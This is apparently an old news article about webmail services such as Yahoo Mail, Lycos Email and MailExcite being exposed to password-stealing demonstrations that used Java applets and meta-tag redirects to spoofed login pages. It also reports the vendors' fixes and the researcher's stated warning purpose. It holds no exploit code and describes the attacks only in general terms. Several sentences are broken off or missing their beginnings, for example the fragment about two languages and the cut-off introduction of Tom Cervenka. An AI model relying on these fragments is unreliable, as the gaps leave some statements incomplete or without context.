Just as Microsoft's Hotmail
cleans up after a widely
publicized security problem, free email providers across the Web are
struggling to plug a host of similar, newly recognized holes.
Specialty Installations, the
Canadian networking solutions provider whose password-stealing demonstration
first drew attention to Hotmail's security woes, today posted another demo
aimed at Yahoo Mail. While the first
could fool users into handing over user names and passwords, the new
demonstration used a Java applet to accomplish the same thing.
two languages are unrelated apart from their names.
Yahoo Mail, which uses its own proprietary technology, plugged its Java security hole hours after Specialty Installations posted its demonstration.
Sites that are vulnerable to the new Java applet exploit include Lycos Email, MailCity, Eudora Web-Mail, and MailExcite, according to Specialty
The Eudora mail service that is affected is Qualcomm's free Web-based service, not its popular desktop email application.
Hotmail is not vulnerable to the Java applet exploit. Nor is USA.net, which powers Netscape's WebMail, American Express's AmExMail, and USA.net's own NetAddress.
Specialty Installations has posted a chart listing
so-called Trojan horses, or malicious exploits that masquerade as benign
ones or insinuate themselves invisibly into the user experience.
Metatags are capable of transporting users to a spoofed "timed-out" page
that could fool them into disclosing names and passwords.
Far more sites than those listed by Specialty Installations are vulnerable
to the present exploit. iName, which
powers the listed Lycos Email, also powers more than 40
other free email sites, including those branded by InfoSpace, Switchboard, Standard & Poors, CBS Sportsline, CNN, Time
Warner, AltaVista, Lexis-Nexis, the Oakland Raiders, and Lycos's search and
directory sites for the United Kingdom, Germany, and Italy.
iName also will power free email for search and directory site Snap. That email service will launch
in the third week of September, according to iName. (Snap is a joint venture between NBC and CNET: The Computer Network, publisher of News.com.)
"iName is aware of the metatags and Java applets issues and is currently
working on a fix for those," said Peter Hamlen, vice president of software
development at iName. "We also believe the problem is more pervasive than
Because-We-Can's list of four problems suggests, and we are coming up with
a more complete solution."
Because-We-Can is a group within Specialty Installations devoted to
nonprofit programming efforts. Web programmer Tom Cervenka, who goes
Hamlen said iName would release its fix on Monday. He said it would
include filters for browser plug-ins such as Macromedia's Flash as well
as Microsoft's ActiveX controls and VBScripts, all of which could be
accomplices in a Trojan horse attack.
WhoWhere, whose Webmail technology powers MailExcite, MailCity,
applet security holes affected its sites and said it was testing
a fix that would be ready within 24 hours.
Other sites with WhoWhere-powered email include ZDNet, TheGlobe.com, NetNoir, and the Oakland Athletics.
Specialty Installations' Cervenka said, as he has on the subject of his
other exploit, that he designed the present one to warn companies
and the public about the security hazards of Web-based email.
"We're not trying to use this as an illustration that there's a problem
with Java applets in general, but rather that there's a problem with the
user interface or filtering design of the Web-based email services,"
Cervenka said. "I think once people see this chart we made, they will have
a good idea of how good the players are. There are some strong ones, some
that are totally vulnerable, and some in-between. It's a nice spread."